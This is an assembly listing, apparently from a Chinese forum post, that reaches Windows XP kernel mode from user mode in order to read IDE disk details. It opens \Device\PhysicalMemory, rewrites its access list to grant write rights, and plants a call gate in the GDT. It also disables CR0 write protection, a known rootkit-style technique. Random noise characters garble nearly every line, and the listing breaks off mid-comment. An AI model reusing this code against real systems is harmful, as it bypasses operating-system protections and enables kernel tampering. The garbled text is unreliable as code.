|
|
我可没这个水平; ~: S8 ?- t% }0 c) B6 K
.686p6 x+ n6 m8 i' E: m
.model flat, stdcall& T0 g! h+ L! u5 z( W+ C
option casemap :none ; case sensitive
4 N j0 u/ S# s+ j# V# H( |; #########################################################################
/ W: {* |% `! i: s1 i. Iinclude \masm32\include\windows.inc% ~' j' Q' G4 e" y
include \masm32\include\user32.inc
8 G/ I. H" a/ V; [+ | Oinclude \masm32\include\kernel32.inc. x1 k( L& H F v
include \masm32\include\advapi32.inc! e( m' J5 i& _
. h1 q5 j9 B" H
includelib \masm32\lib\user32.lib" W6 y3 f, @3 i5 u( M: L
includelib \masm32\lib\kernel32.lib
4 {" p" @, b) s1 O1 qincludelib \masm32\lib\advapi32.lib8 k4 S$ X" o( ~5 N7 e
DEBUG = TRUE
) e; p8 S. j% {2 P( @3 @* z4 Y- w5 I9 J: u# H: Z2 }
HMODULE typedef dword! g5 V1 y- w+ ]# F7 H! K
NTSTATUS typedef dword
+ n* Y3 z+ f+ }: U5 r2 `% S( JPACL typedef dword- a- p: b. M; ~' u
PSECURITY_DESCRIPTOR typedef dword5 ~& N0 }0 Z) ]9 t {2 I
, X" x! t6 k4 Y
OBJ_INHERIT=2 # ], Y" g3 l9 @4 ^$ Z3 f+ j! B
OBJ_PERMANENT=10h
7 D( u7 `& k* x! ^OBJ_EXCLUSIVE=20h
7 q. v) a7 h9 f( P+ x: \OBJ_CASE_INSENSITIVE=40h
2 D8 i$ d& X# f# `" |# K6 _OBJ_OPENIF=80h
8 D3 ]6 l8 q* p+ r. _OBJ_OPENLINK =100h
! ]( W* x. p5 m2 zOBJ_KERNEL_HANDLE=200 5 i8 ^7 T/ a6 Y& T# p% F
OBJ_VALID_ATTRIBUTES=3F2h
; O) W( C1 P- K/ j" `; A4 w( i) `! I) R
SE_KERNEL_OBJECT = 6
) H/ y: c% b+ S0 q' YGRANT_ACCESS =1: _* I- x( D0 w, \& ]5 e$ s
NO_INHERITANCE =0
7 F: Q; P" p9 \: ITRUSTEE_IS_NAME=1
$ R1 E/ U' b) I9 N1 k5 o, zTRUSTEE_IS_USER=1 Z1 A7 q v+ m+ }! Q
STATUS_SUCCESS =0 3 k; ^. M. r! F" s# Z% `
STATUS_ACCESS_DENIED =0C0000022h
( }, q3 x& b9 y: i4 P( `4 J% R+ h G: U1 o; i# k, g) e1 z
STATUS_ACCESS_VIOLATION equ 0C0000005h
: A2 h+ s( {! VSTATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
, w- p: y8 C, _/ ` VSystemModuleInformation equ 110 P2 P0 i) I$ E W- f6 k! r5 V) ~5 c
PVOID TYPEDEF DWORD: G2 T7 m* t( Y5 t+ e. e4 h5 Q
UNLONG TYPEDEF DWORD
: \( N4 d; y, F' C" m8 TCHAR TYPEDEF BYTE
) V+ B* x i, m8 q1 \8 u3 Z- A) ^$ H4 Y/ @" h0 ^
UNICODE_STRING struct ( w1 s E2 ?5 e
nLength word ? 6 W/ }7 f+ h4 w1 t
MaximumLength word ? . h# Z& L: R2 w* t
Buffer dword ?
9 q. I; x& u* D, N' H: B# eUNICODE_STRING ends: ^# K& p8 }9 \; ~& ^( E J
; R( N1 W* _* W4 P# `' J6 z8 y
OBJECT_ATTRIBUTES struct , W8 ?+ f! W# `
nLength dword ?
& i! P7 g# l/ h) W& K2 {3 z RootDirectory HANDLE ?
3 k) J" I. t$ f6 t ObjectName dword ? UNICODE_STRING 5 f J& [. y2 b* q6 y
Attributes dword ?;
- U: ^7 G% m) V: W" C3 y SecurityDescriptor dword ?; PVOID // Points to type SECURITY_DESCRIPTOR 0 A- `; c/ @) K0 C
SecurityQualityOfService dword ?VOID // Points to type SECURITY_QUALITY_OF_SERVICE
% X2 [6 l ` qOBJECT_ATTRIBUTES ends ) v7 @* @; e2 x0 [0 ^; g
5 M. p, u$ |6 q( i! @% R
5 o& ~) g. ^, {5 \; \6 \' L
TRUSTEE struct , g) K( `! a, [' t' r O
pMultipleTrustee dword ?TRUSTEE * h! a- a1 q/ I
MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION 0 U* y; l) `/ u1 N" v0 K, k, J
TrusteeForm dword ?;TRUSTEE_FORM) \* U$ Q( d$ ? B
TrusteeType dword ?;TRUSTEE_TYPE
8 ~' C+ x7 G$ C6 \" y! H1 S ptstrName dword ?;LPTSTR ! g' P$ P+ Z# X" Z$ _+ _% C8 w
TRUSTEE ends+ F( _8 F, K4 V! q. q
7 i+ f7 i6 m$ j: m* i0 t
. `0 |1 w3 b3 `$ R- l6 u8 k! Z AEXPLICIT_ACCESS struct/ T7 W: w5 ]! B
grfAccessPermissions DWORD ? . k7 a3 A1 }& @: \2 f
grfAccessMode dword ? ;ACCESS_MODE 9 _; m+ V. V$ o8 [) [, q
grfInheritance DWORD ? ;# H9 k( z3 k$ ?' l
Trustee TRUSTEE <> ;/ Y- F Q* ]+ _+ s- e' V$ S) b a# o0 K
EXPLICIT_ACCESS ends
* L! m9 N' F$ @$ Y% y6 `3 `
' P% x& G9 t1 a, OMyGATE struct ;门结构类型定义
( Z2 m, }/ D& C- \8 @5 E, ]# h OFFSETL WORD ? ;32位偏移的低16位
# y. l4 I; b1 j# |$ W# m3 B% p SELECTOR WORd ? ;选择子8 J) b7 b. `5 \2 F- N' w6 U
DCOUNT BYTE ? ;双字计数字段
- T$ e a) l7 }. _; [ GTYPE BYTE ? ;类型
9 ]* A$ w0 O# v- _" ]3 T3 [ OFFSETH WORD ? ;32位偏移的高16位. _: }: [" z, t: n9 U, ?
MyGATE ends. H. e* W2 e6 e; f( F8 J
3 ?$ L$ N/ L! ~# RIDEINFO struct
8 U& ~( J* A! F' PwGenConfig dw ?- x1 e* d) k: z5 X" s) x
wNumCyls dw ?;拄面数
8 \/ E2 c, N% n% s4 O# A5 p2 |wReserved dw ?: Z8 U8 g r5 Z2 C
wNumHeads dw ?;磁头数" O- b% r$ D( H: n4 \8 ^
wBytesPerTrack dw ?;每道字节数" x1 c) Q7 t% ^
wBytesPerSector dw ?;每扇区字节数
. Z/ @) g( {, d! s4 H& GwSectorsPerTrack dw ?;每道山区数+ G$ n. e5 }( Q: l' t
wVendorUnique dw 3 dup (?)
& _, ?. o0 H5 U" \2 j# zsSerialNumber db 20 dup (?);硬盘序列号
2 `$ ]( P2 V' [0 b `wBufferType dw ?;; c; ~& N ]+ _+ q2 J/ C& v2 k
wBufferSize dw ?; ;n * 512
' Y% q# A$ |( D, ^$ q0 kwECCSize dw ?( s: @, D$ @! V1 G2 ~
sFirmwareRev db 8 dup (?);
- T7 m- J+ o8 m8 l7 K% lsModelNumber db 40 dup (?)* j+ V& f2 e$ d
wMoreVendorUnique dw ?" H4 u! V& r. K/ F' ~* @& C3 ^9 a
wDoubleWordIO dw ?
6 ~" f) s: |: O! N# gwCapabilities dw ?* ~7 @6 S" ` f
wReserved1 dw ?& C9 ]/ U: q! W' A, \9 n) q& [# v
wPIOTiming dw ?;
) K* e% O& }# f* W6 QwDMATiming dw ?;
: T7 e9 Q: |+ {" }0 TwBS dw ?3 d, R1 O: N2 R* ^
wNumCurrentCyls dw ?;
S; J( n0 B* f+ g1 H8 IwNumCurrentHeads dw ?;
7 b% I& [9 i, W+ j, ~1 AwNumCurrentSectorsPerTrack dw ?;
' f2 ~$ j/ O, ?4 _/ jdwCurrentSectorCapacity dd ?;
6 P/ V% k; h l0 ~! ]/ h3 ]wMultSectorStuff dw ?;- ^" n3 s& z, e
dwTotalAddressableSectors dd ?;
, Z& i6 i) N# P: }3 X( t# @: FwSingleWordDMA dw ?;' S% r! ~( w+ Z, i
wMultiWordDMA dw ?;
9 D" L; Z8 p' Q0 n& TbReserved db 128 dup (?)3 C8 U. z: J$ [8 F
IDEINFO ends( ~- H- B. V: w1 i/ P( r
P0 {! W7 z. o& W: J6 L
& j5 W& G$ J$ J# bSetPhyscialMemorySectionCanBeWrited proto :dword- y a1 |& C7 ~0 @" _+ ]+ V( v
MiniMmGetPhysicalAddress proto :dword
9 m8 f# f" s3 h# S* M v% e9 T
$ N# x, B( w3 C) x" j/ Z6 PENTERRING0 macro" `, y( x5 |# X+ K
pushad
9 R2 j9 p8 |3 P# C* k3 npushfd
) |- C! N0 {# [3 n" Scli
, A8 U( A: }+ c2 p. `& _mov eax,cr0 ;get rid off readonly protect3 `/ L7 d" @; F5 l
and eax,0fffeffffh {: R1 P8 T: k' y8 L( f1 R& [8 ]; ^
mov cr0,eax; I4 H& z2 G. j
endm8 Q6 Q, s+ h& o; J4 r
9 y+ J o* f: { z; T% N
LEAVERING0 macro' x( F/ C$ p' l1 _9 i
mov eax,cr0 ;restore readonly protect5 X/ X7 T( P2 S5 f
or eax,10000h
" }' l6 W! L0 m' X8 Z+ xmov cr0,eax
2 u9 R$ e% W$ s& T' T2 ?sti
2 D" w4 w) H# I8 H% j! Lpopfd 9 {: |8 x& x, B& G
popad ; L/ t4 u' U) s) t% d0 C" A
retf, R/ O, i% K! w+ t& E
endm
4 l3 Z2 O/ h& I! V! E( E8 E5 H# s2 @9 ^+ p( P) O {5 {( _/ B
j& @; D# G. G( }3 f% b' oUNICODE_STR macro str
- i* |, t1 T5 Y- k' x6 b- @( W3 Iirpc _c,<str>
* n# W- e1 ~# i- |, S- D6 `0 p5 {( ydb '&_c'
h" d4 N5 F( l7 F/ V+ {8 ~& T* [! Gdb 0/ C; b- C" ^( O' L
endm
6 a- c# B- x8 \2 g9 h$ D4 l5 Q) Fendm5 Z0 l* d; Z) N' i" U$ l
' m+ \2 X9 V: ]; I9 }: q4 d$ H- a, q& q' J+ ^.data?. V7 K6 Y5 S: y- a
GdtLimit dw ?
" K2 v' ]1 F: I4 qGdtAddr dd ?
6 T6 c' z$ i, k0 r6 ]# N8 {3 l( W( A
mapAddr dd ?
/ V R2 H" v4 r! f# P, L2 R- Z: Q8 aOldEsp dd ?
& f' g) B m+ |. ^. @+ b/ l+ O( \6 I2 F. g( ?( m4 X b
readed dw ?) a. H+ w R: @1 k; ?
buffer db 512 dup(?)+ \4 I0 ~3 k& N5 m
ShowText db 512*3 dup (?)
4 y. m) S' N q$ ^' r
/ n3 t* Y- Y% T9 |szBuffer db 1024 dup (?)
" z% I6 D' P; z: Y h# J' rszModelNumber db 41 dup (?)5 s- U, P# j7 {% U
szSerialNumber db 21 dup (?)6 {8 k. i' m f* V- Q; o
szFirmwareRev db 9 dup (?)
- H P3 q1 _! L4 Z, N% h/ f( q' L5 O( F o) u; D: {" c/ V
stIDEINFO IDEINFO , H1 k# T g2 _# ]* k; S/ L! O4 J! I
. }2 w: S/ J- a+ d( @1 \/ Q3 J
.data
4 m3 ]- I! Z I+ ?' v q( Qalign 43 d9 _! N! z6 t2 l
objname dw objnamestr_size,objnamestr_size+2
) ]1 ?, ~8 w2 A. z; p2 W! hobjnameptr dd 0
5 I5 x1 L s2 k: o5 Fobjnamestr equ this byte
8 o5 R9 f/ U+ t- CUNICODE_STR <\Device\PhysicalMemory>
. O2 D, b* n" |* [- oobjnamestr_size equ $-objnamestr
& V: F- N# I1 d4 F8 i; I% f; _: `- [: m: H
szTitle db 'IDE 硬盘信息',0
5 f: `9 O6 O8 Y- J7 u. N! YszErrInfo db '无法读取硬盘信息',09 H' a. R5 o M8 B2 J% {. P9 ~
szIDEInfo db '柱面数 : %d',0dh,0ah
6 g% t1 ]9 Y+ f' Q4 b db '磁头数 : %d',0dh,0ah5 C7 n6 u6 ~" s" z
db '每道扇区数 : %d',0dh,0ah
9 g# G! | d1 w/ K) `+ s7 F: w db '缓冲大小 : %d 扇区',0dh,0ah K7 |. C& ?& m9 Z! w
db '硬盘型号 : %40s',0dh,0ah
* o) ]- N5 z: a* @( v" w3 R db '序列号 : %20s',0dh,0ah* T- z9 l' }0 ]5 t' l7 l6 c2 q' @9 g
db '版本号 : %8s',0
# K- c. f! i( e. N
' ~1 ^- x! o5 g$ H+ J3 r8 r0 Halign 46 _* ] @- }! l6 j+ c
ObjAttr db 24 dup (0)' } ~* c3 |; b+ }! ]% L' y
. p6 | q) W7 z0 O* V: b
Callgt dq 0 ;call gate's sel ff* e; i$ m/ g% ]! a, P4 f
Caption db 'Windows XP绝对磁盘读写',0
4 h* u# `+ M" s+ Q! e* X- t5 gDigit db '0123456789ABCDEF',0
$ c/ a3 x' k$ |0 K8 x% Q.code @2 j \% ?5 E8 m
_ShowBuffer proc ;显示所读出的信息3 P- p! `4 L" a; N" E+ v
;把数据转换成16进制的形式8 q4 Q% V/ T0 V
mov [readed],5126 L% M, u$ ~2 f \& ~9 Q9 j
mov esi,offset buffer ;数据
: h7 P- U% } x) ]4 z- E V mov edi,offset ShowText ;转换后的数据6 |0 u3 o/ p3 w7 O9 i9 r4 p
mov ebx,offset Digit
. r l( d, r& y1 B3 m5 z- L; } xor ecx,ecx$ u' i$ y# G2 E% U9 @7 X% |7 J
xor eax,eax$ }2 R- E. m+ |: t1 {
computeAgain:) q) q; ]5 E" K, ~. {4 Q2 H
cmp [readed],0
% s/ M1 ]- I8 [% h+ C, s. w jz endCompute
3 e$ t0 K5 V6 o t' `/ Y+ A dec [readed]$ I* e8 N2 v/ ^. W' Y
lodsb
: d9 N/ S" ?6 }0 ^ push eax6 O* W' A6 |& N! m* _3 L$ x% ?
shr eax,4 ;高4位
! z" U* [$ i$ i! o! a xlatb8 S9 b: y# r# l
stosb
2 g* l2 L2 C2 y7 E& N- ^! ?4 H pop eax
! T8 z3 J7 c6 @+ Z2 V and eax,0fH ;低4位
. \2 `9 c# }! X4 @7 Z! O5 L xlatb
: V4 p a; P+ Q$ f. ~ stosb
/ f- d; l( R! Q$ O mov byte ptr[edi],' ' ;空格
/ W! u% C5 V/ V# \, n) @ inc edi. q1 i& |% O3 {8 Q9 M" q
inc ecx( [9 B& R" o) u3 ^- [8 w9 I& I3 ?
cmp ecx,16
1 o" D7 @$ H8 C4 ~. m& Z A jnz computeAgain- b( w+ n1 g, T+ e5 Y% D9 T
xor ecx,ecx
' Q/ a8 c1 Q" V mov byte ptr[edi-1],13 ;回车 D+ O& }- S$ \" l. g
jmp computeAgain
4 E- n3 D& }8 U- j$ U( K6 i3 OendCompute:5 T' i) q& C/ y$ o8 e7 ~
;显示
, A+ P4 I2 J6 u+ d invoke MessageBoxA,NULL,offset ShowText,offset Caption,MB_OK
- u* Y: n: K- t4 K, h$ y0 U7 c2 d ret+ y7 b0 e' C4 b
_ShowBuffer endp( _4 h" t, R$ s8 l$ `, g$ V$ I6 V
5 U4 i- n [, w
SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE 2 `6 J' T) n2 J! F3 E
local pDacl: PACL # E8 ~) y+ ~( G
local pNewDacl ACL 4 I" A! h. n$ U
local pSD SECURITY_DESCRIPTOR
( @! p4 p0 s# d0 xlocal dwRes:DWORD ;, g, L/ Q3 A& A" J1 U' h% X
local ea:EXPLICIT_ACCESS ;0 }, N c- n7 `5 X9 P
invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL, addr pDacl,NULL, addr pSD8 H) I# V7 x* s2 G# @
cmp eax,ERROR_SUCCESS
* Q0 o3 k7 ?, njz @f* x0 U. N: i( C/ g# {
jmp OutSet
4 r2 H9 S! K! T@@:0 D3 B G0 L9 C# e
mov dwRes,eax
0 H: M3 L- e2 M- Y* ?4 ?! K2 bmov ea.grfAccessPermissions ,SECTION_MAP_WRITE;22 b7 m6 \, w) w; Q
mov ea.grfAccessMode ,GRANT_ACCESS;1" N3 p1 l z! s6 e# P7 v$ t
mov ea.grfInheritance,NO_INHERITANCE;0! R( X* i4 N) d7 R
mov ea.Trustee.pMultipleTrustee,0
( z* S3 Q( S( H/ K' b- rmov ea.Trustee.MultipleTrusteeOperation,0
" D h6 A+ W \; Xmov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;1
+ k7 y$ `$ E1 d8 jmov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1' ~; m/ r2 M5 ^; J
call @f5 n% h1 P2 r' U1 g4 m: ?
db "CURRENT_USER",0+ [& M+ z2 K6 v+ _7 @3 V
@@:+ q& O* C; B- H& S
pop edx
! h: I& M# Z- n( I4 Rmov ea.Trustee.ptstrName,edx7 G8 ~4 E4 O+ Q) H# |3 B8 w6 k, G
invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl; }1 v& d( j L" j3 p9 u
cmp eax,ERROR_SUCCESS' [7 ~7 Y p8 ^$ H9 r3 z( T S
jz @f
, A& E6 c9 w5 I7 n3 @6 {jmp OutSet
J7 g3 J# O4 W: F" y% n- H3 ?9 D6 l@@:
* ~2 j3 O# W+ L) f2 n& ~invoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,pNewDacl,NULL
/ a$ c/ k( Q+ J3 N! d3 I/ }& DOutSet:
% i0 d) V/ \ N- h! x" M; g6 Fcmp pSD,0
5 Q, _' i: T, ?- Wjz @f
1 e0 P6 y, f* L( Qinvoke LocalFree,pSD
/ f4 }& X: |# o. \; n0 F@@:
7 S, F' \4 H# D2 o1 u2 z& w' e; zcmp pNewDacl,06 N' ^ Y1 J; [. n; w0 V4 _9 [
jz @f
# V- X, `+ `, A* `* Y0 |% ^2 Ninvoke LocalFree,pNewDacl
7 ]8 ` X4 e1 d1 ]1 Q" j" J@@:; L5 x" t& }6 ]* A$ E, V
ret& {' ~- S+ p% F' x# c8 H$ q7 g
SetPhyscialMemorySectionCanBeWrited endp
Q+ m# M9 b' f7 X, @3 A2 V9 q" W' ~
: ~/ M: h( E5 x- x5 m5 cMiniMmGetPhysicalAddress proc virtualaddress:dword
" _* G% i9 G* Q8 `2 x/ b9 Q0 E mov eax,virtualaddress( {4 { `5 O7 \. s F# b- R$ H
cmp eax,80000000h$ f; Z5 Z) n9 l9 E
jb @f
, k- w' p# x9 Y3 W3 z cmp eax,0a0000000h
5 U I& @% G z% W/ b+ R& d jae @f r+ m$ g$ M! C# {1 Q O* g% G
and eax,1FFFF000h
8 q5 v( @5 N6 O8 w! L# ` ret4 l0 u* A. S4 B
@@:9 G. P8 c5 @/ m+ [
mov eax,0
2 B D" H0 r5 k3 u1 L ret
" ^( A( @$ [+ kMiniMmGetPhysicalAddress endp
) c- C* H- v- C4 d8 f
8 }; z( E ^# E; t. ?4 }' KExecRing0Proc proc 0 R4 ]* n% d+ D Y2 f. J
local tmpSel:dword
3 x1 o4 p1 z6 Z/ ?1 A- j) H6 Wlocal setcg:dword$ l. D6 e, f, p8 |
local BaseAddress:dword
9 e" u! p" d: \! Olocal NtdllMod :dword
, u* e- E% i: d# u) F: j- L% p5 vlocal hSection:HANDLE
5 ~2 N( X# ` Elocal status:NTSTATUS( \: L7 e8 H; o2 A
local objectAttributes:OBJECT_ATTRIBUTES
8 D. N( @$ {+ K2 J9 X" p, ^9 Elocal objName:UNICODE_STRING6 y0 J$ Q1 }' O5 P1 S6 F1 ~
mov status,STATUS_SUCCESS; ) C3 W1 l, P+ S- i
sgdt GdtLimit3 x/ v/ C n" J- K/ b# a9 n( P- F
invoke MiniMmGetPhysicalAddress,GdtAddr& U3 f; y1 E' t8 m" I& N h6 a8 I
mov mapAddr,eax
7 a4 a' U' E- y! ftest eax,eax5 D/ w; ?6 y% g& g. `5 O
jz Exit18 S( z w- P6 `; x# }, Q( I4 e9 o+ m
call @f
. B# G7 n2 I3 ~5 i$ V7 gdb "Ntdll.dll",0, e% ^) D; \$ L9 x& ?
@@:) m& Q+ L9 A Y9 o9 S! H8 Z- @1 z
call LoadLibraryA
7 G+ e! W0 p) cmov NtdllMod,eax
$ E: M4 V" v# Y3 t1 |
, f# B4 v) ^& D) hlea edx,objnamestr [6 b0 Y, t$ O1 G9 }& i4 t
mov objnameptr,edx. _; F! h* l+ W
lea edi,ObjAttr. O% [/ D7 B" P4 H+ B
and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail; l s' b% B; i/ }9 \
push edi ;edi->ObjAttr
2 M1 Y4 z+ G* \5 s% G& S! \push 24 ;length of <\Device\PhysicalMemory>
3 s/ a$ x; s8 d# T( Z8 I% qpop ecx6 ~- ^2 y! V( q( s
push ecx' R' G3 W' M- B% _& N
xor eax,eax& C! B! n2 I& I, C2 f6 x
rep stosb ;put ObjAttr with 01 ] Z: g) l" D
pop ecx
4 X: H6 q9 u* O/ [/ r' lpop edi
$ c8 Z/ N+ n' L' W+ ?mov esi,edi
u+ ?* L# N' `: l4 xstosd+ H, A$ Z9 J+ F( @; |. A9 _! h8 O0 r0 \
mov dword ptr[esi],ecx9 h- w1 W% M. W5 l9 t5 b
stosd 6 y( @! E: K% v6 R3 o( h$ j5 | E
lea eax,[edx-8] ;eax->objname0 i+ h5 q$ k) e, e! l* t- u$ A+ m
stosd ;ObjAddr(18h,00,00,00,00,00,00,00,offset objname,40,02,00,00,dd 2 dup(0)% D% k7 A+ `$ F% ^% e7 X
mov dword ptr [edi],240h/ J! X% m# |7 [ u9 l
, K& s& C- G+ e% c5 \ x5 |% Ocall @f
9 ^- k% e, }$ a& Z, G$ xdb "ZwOpenSection",0' \' B2 p% D+ A* H7 k
@@:* G; g( X u" p6 O4 {
push NtdllMod2 \# I3 m1 c7 n- I
call GetProcAddress' p+ r6 q0 b# S' {
mov ebx,eax ;ebx=ZwOpenSection
* O% ]# y6 b8 L2 }& {. m/ M: a% G6 J' e# n, |# R! G
push esi ;esi->ObjAttr
/ r3 E8 J1 w& j2 K4 Zpush SECTION_MAP_READ or SECTION_MAP_WRITE9 H. N0 {4 C, H& g( b
lea edi,hSection7 a4 }! j- n% H" W' Q
push edi ;edi->hSection/ D3 ]+ j$ X% g! @8 A; I* R
call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr)& F3 K' B d& G% |+ D& u
! ^3 e: Q7 ]3 z8 b5 K# }mov status,eax
* ?" _9 o( ~' D$ ~+ {cmp status,STATUS_ACCESS_DENIED
! z: {/ ^5 U* d/ d) }jnz AccessPermit
4 M+ [ O' L% h5 B/ [ Tmov eax,ebx4 U6 e2 @5 u6 L, a: Z4 l0 R
9 C: k% ]% i$ J0 P! S+ mpush esi
8 ~5 Q1 h! p% x9 dpush READ_CONTROL or WRITE_DAC
$ U6 x( ~ v4 g- }5 X8 cpush edi 9 o2 M" R+ M# b" Z/ n6 `
call eax : P# N' g* L7 @5 \
4 u s: Y. f$ \. ?/ A
mov status,eax. S$ R( j- F. b+ Q9 p
invoke SetPhyscialMemorySectionCanBeWrited,hSection
+ o& f, ?; t3 i" g! ~0 p, g% Z8 X7 L: z, O6 M1 y1 m% t
call @f" t. Q! f4 c, k/ ?- s" _ v! S8 m
db "ZwClose",0$ c4 x/ z( m( C- f5 E6 K% o( Y
@@:8 k5 f% X) z) f9 X: v
push NtdllMod
& O% {7 S4 f' ^1 s8 w' F1 Icall GetProcAddress% d$ z! A9 H3 p. e0 ~ ~8 M
5 A* y$ t3 V; e3 S4 Q: xpush hSection ]8 X0 p' X/ }4 g6 W" [( _
call eax ;zwClose hSection9 I- }6 j: a! w |+ G, _1 T: x p
4 I0 L8 O. G, }+ Q+ z
mov eax,ebx) h6 I0 R0 a. f" |; B5 q& c
' V2 ]) q, C' Q5 i S
push esi " k3 [- T+ D0 u) m+ n! T) t; E6 ]0 g
push SECTION_MAP_READ or SECTION_MAP_WRITE
3 d% ]3 n9 e4 A3 P2 G* I0 }) K# Blea edi,hSection3 N7 v1 A9 L* t Z* f- o$ i6 s
push edi {; D0 D8 ^% ?) ^8 B* m
call eax
S& D6 {: _ g; O! u4 Jmov status ,eax) N L/ v8 f! h
;status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes); 3 u1 _" x( H1 L% q- u- t
AccessPermit:
2 M# X/ l' @. p h" ?cmp status ,STATUS_SUCCESS
! e2 d* ^/ v* C$ ^jz @f% T K5 c% c2 j$ |! c6 p* [
;printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status);
0 X! B1 f1 p, v. P% s% j;return 0;1 y7 l" e% g# P7 M, ` t$ t% O2 p# K4 b& a
mov eax,03 L( h, C7 N1 k$ g/ p
ret
4 b5 @( a5 u, Y& ]: d( L- J@@: Y% j% C8 @: s, F" O4 g' ~! Z
movzx eax,word ptr[GdtLimit]
0 T* V" u( ?+ U: ~ kinc eax
. L7 I3 L a+ L& U: Einvoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, eax
$ w4 u' t8 s- gmov BaseAddress,eax
9 r. c1 N; U6 y* _* T7 `5 Ocmp BaseAddress,0
7 m8 q2 e6 m8 ^- m0 Q3 njnz @f0 C0 T5 o. {) Z* v8 }
;printf("Error MapViewOffile:"); % A/ {$ \1 M d) ]- k2 H
rintWin32Error(GetLastError()); return 0; ! h, O+ s# g2 c' d7 C
mov eax,0
" X4 Y- p& U& Xret; F/ \0 u8 b. G1 X; Q* U7 R
@@:
( T3 S" v8 `. N& y+ W( Q4 dmov esi,eax ;esi->gdt base
- I. w* p% _ p9 M$ Xmov ecx,3e0h
0 b# d) l1 Z" O) I- t. i3 Rmov eax,GdtAddr
7 }8 G( H! t$ z6 ~+ _.if dword ptr [esi+ecx+2]!=0ec0003e8h8 M4 l* K8 b: V- {' P; A! }
mov byte ptr [esi],0c3h
; f( z: |8 o; Y
: a; ?, q$ V" [1 K ], v1 nmov word ptr [esi+ecx],ax
6 @, S4 Q3 B E& G9 N4 r" Dshr eax,16% G" d. Z0 V& N+ r
mov word ptr [esi+ecx+6],ax
4 x5 U# N# Z% Nmov dword ptr [esi+ecx+2],0ec0003e8h. a. n$ Y2 J5 b3 J" L+ m6 Y; G
4 W6 ~, D* R5 U; h
mov dword ptr [esi+ecx+8],0000ffffh
+ S- `% T3 U B% s3 Lmov dword ptr [esi+ecx+12],00cf9a00h! i+ ?" |) D1 f f S$ u
.endif% l. E n$ l0 T* A
4 H8 C% ~/ y! c5 a5 c @8 T
mov setcg,TRUE
% t: E% p+ L7 |0 D( ?/ m; Qcmp setcg,0, Z* S9 V: g% t8 j
jnz ChangeOK* k6 m+ x! z% l9 W- Q9 B \
call @f
3 a3 O% T5 R: H, S* P! h, G9 Qdb "ZwClose",0 {+ B. ^" _/ _7 S) |
@@:2 L( F7 z( C* f- D, ^
push NtdllMod7 a1 V; M/ ` [8 M" C% |. K' {3 S
call GetProcAddress
! J; h: [: J1 H( b; p$ i) P, W6 Ppush hSection2 U' [9 W* i) s! c5 b3 D9 Q6 J. J" H
call eax
9 L) z q; Z* n8 _xor eax,eax6 I- o: {; a) g+ `" _
ret
$ {# ?1 S: E6 E0 n+ l) T7 e& ?ChangeOK:
% n# t; ^* ~( W7 |- o+ p- Q, Aand dword ptr Callgt,0
; j% }5 O# i3 L% k3 axor eax,eax
0 x/ K: X1 u0 h$ F" X; D( Bmov ax,3e0h
3 Z+ u/ q( c& w" m( m0 p5 Ior al,3h
/ w) {9 K* B% y: r% Tmov word ptr [Callgt+4],ax * T& B3 d. C" I
;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate;
9 v8 ^9 W' ^ i- o Blea eax,_Ring0Proc* U: N, L) f. E( ?7 m, j) }9 g
;invoke VirtualLock,eax,seglen
! Q5 X5 ~7 ]# R4 @ wtest eax,eax
7 Y9 }0 O6 g) m0 G; wjnz @f
7 o) ~5 b0 ]8 y' J, lxor eax,eax
4 O! z! z$ r3 U% k+ uret
: Q" A* x2 C3 Z/ V$ i4 D@@:
: J2 J) c' L5 z: Winvoke GetCurrentThread
1 K( O! _- s6 }invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL $ L/ [2 e/ o" o9 s8 u' x
7 }$ V3 n1 q1 c# H5 d. {invoke Sleep,0
- M* O- ]8 _2 H8 Mcall fword ptr [Callgt] ;use callgate to Ring0!
0 W/ X U/ A! c$ ^7 q* o, Z% z;_asm call fword ptr [farcall]
% h8 N/ c) b4 o; t_Ring0Proc: ; Ring0 code here..
# @" F2 {% T3 Q$ U' ^/ m1 G' F/ ^mov eax,esp ;save ring0 esp
- i( m( x: ]5 d) k* f. I. h' rmov esp,[esp+4];->ring3 esp
, b4 \/ b% A# u& {push eax# h8 e% h1 D3 B9 W, O! P
mov ebx,offset stIDEINFO: Y/ j2 m# c8 _% Z' O( P+ ^: h p
assume ebx:ptr IDEINFO
' e( {' T$ \ W# M;********************************************************************) U9 M( B+ ?% s% y+ g
; 等待硬盘就绪1 s; s7 S3 a# M& }% V8 w/ s' d
;********************************************************************
! z( w! A. E2 X/ w+ U1 k mov ecx,10000h4 i7 I7 p+ x7 \& B; E
mov dx,01f7h
0 v1 C! M$ q6 X2 |, S1 y @@:
7 s3 f) M' ~9 S c0 M2 s$ Y9 b in al,dx1 _9 [* b4 S! l0 b
cmp al,50h
( R7 V% F ?5 ]7 y+ o/ D1 i jz @F
% j1 _# z, n; p f! g. L/ V loop @B6 m5 A0 b5 \5 ]2 c' K, v
jmp _II_TimeOut
: z1 q9 A6 k, B$ B2 Y @@:' B( H0 a5 n- v. W7 m& g% ~. z' m
;********************************************************************" q$ D9 q) I4 P* S; \. Z, D
; 发送命令3 ~) X- J. q/ h
; 如果向主控制发送命令,则端口为 1f0h-1f7h9 T M( A, J3 Q; N
; 如果向副控制发送命令,则端口为 170h-177h& f) [7 q3 B& i; \; e4 ?
; 1f6h 如果要检测的设备为该IDE接口的主(MASTER)设备,
# |" y0 ]4 z6 n! a; 那么发送 a0,如果为从那么发送 b0
8 @9 i2 U! t, X6 c& i: G t; 1f7h 如果要检测的设备为 ATA 设备那么发送 ec1 [ I/ G5 J! \( z9 C
